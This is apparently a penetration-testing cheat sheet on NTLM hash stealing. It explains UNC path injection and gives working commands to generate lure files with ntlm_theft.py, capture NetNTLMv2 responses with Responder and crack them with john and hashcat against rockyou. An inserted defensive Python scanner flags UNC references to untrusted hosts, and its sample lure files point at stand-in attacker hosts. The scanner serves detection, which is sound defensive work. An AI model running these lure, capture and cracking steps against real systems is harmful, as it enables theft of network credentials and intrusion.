NTLM Hash Stealing

The trick is to force the victim server into an authentication attempt against the attacker-controlled host. See the list of places where an NT hash can be stolen. In general, wherever a UNC path can be injected, an NTLM hash stealing vulnerability is possible.

The ntlm_theft.py script generates multiple lure files that each trigger an NTLM authentication when opened. These files can be placed wherever the victim will open or execute them (e.g. an SMB share).
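A defensive counterpart to the UNC path injection described above, added here as an example and not part of the original note: a small scanner that reads text-based files from a share and flags every embedded UNC reference (both the \\host\share and file://host/share forms) whose target host is not in an allowlist, which is the giveaway of a lure file. The trusted hosts, the corp.example suffix, the 10.0.0.0/8 subnet and the sample file contents are all constructed for the example.

```python
import ipaddress
import re

# Matches a UNC reference in either Windows form (\\host\share) or the
# file://host/share form that .url, .scf and .library-ms lures also use.
# The (?!:) lookahead skips local file:///C:/... URLs, which have no host.
UNC_RE = re.compile(
    r"(?:\\\\|file:/{2,})([A-Za-z0-9][A-Za-z0-9._-]*)(?!:)(?:[\\/]([^\s\\/\"'<>]+))?",
    re.IGNORECASE,
)

# Constructed policy for this example: hosts, DNS suffixes and subnets the
# organisation legitimately serves shares from. Anything else is suspicious.
TRUSTED_HOSTS = {"fileserver", "dc01"}
TRUSTED_SUFFIXES = ("corp.example",)
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]

def host_is_trusted(host):
    """True when the UNC target is a known internal host, domain or subnet."""
    h = host.lower().rstrip(".")
    try:
        return any(ipaddress.ip_address(h) in net for net in TRUSTED_NETS)
    except ValueError:
        pass  # not an IP literal, fall through to the name checks
    if h in TRUSTED_HOSTS:
        return True
    return any(h == s or h.endswith("." + s) for s in TRUSTED_SUFFIXES)

def scan_text(filename, text):
    """Return (filename, host, share) for each UNC reference to an untrusted host."""
    findings = []
    for m in UNC_RE.finditer(text):
        host, share = m.group(1), m.group(2) or ""
        if not host_is_trusted(host):
            findings.append((filename, host, share))
    return findings

# Constructed sample share contents (not real files). 203.0.113.5 is a
# documentation-range address standing in for an external listener.
SAMPLE_FILES = {
    "invoice.url": "[InternetShortcut]\r\nURL=file://203.0.113.5/share/invoice.pdf\r\n",
    "folder.scf": "[Shell]\r\nIconFile=\\\\lure.attacker.example\\s\\icon.ico\r\n",
    "links.ini": "Docs=\\\\fileserver.corp.example\\docs\r\nArchive=\\\\10.1.2.3\\archive\r\n",
    "readme.txt": "Nothing interesting here.\r\n",
}

def scan_share(files=SAMPLE_FILES):
    """Scan a {name: text} mapping and collect findings across the whole share."""
    return [f for name, text in files.items() for f in scan_text(name, text)]
```

Running `scan_share()` on the samples reports invoice.url and folder.scf and stays silent on the two files that only point at internal hosts.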

# Generate every lure file type
python ntlm_theft.py -s $responder_ip -f $filename -g all
# Upload the files and have them opened or executed from the victim machine

# Listen for and capture all NTLM responses
responder -I $net_interface

The captured NetNTLMv2 responses can then be cracked offline. They are not NT hashes, so they cannot be used directly in a Pass-the-Hash type of attack.

NetNTLMv2 hash cracking:

# Quick ($hash_file holds the captured NetNTLMv2 response(s), one per line)
john --format=netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt $hash_file

# Common variations (hashcat mode 5600 = NetNTLMv2, rules applied with -r)
hashcat -m 5600 $hash_file /usr/share/wordlists/rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule
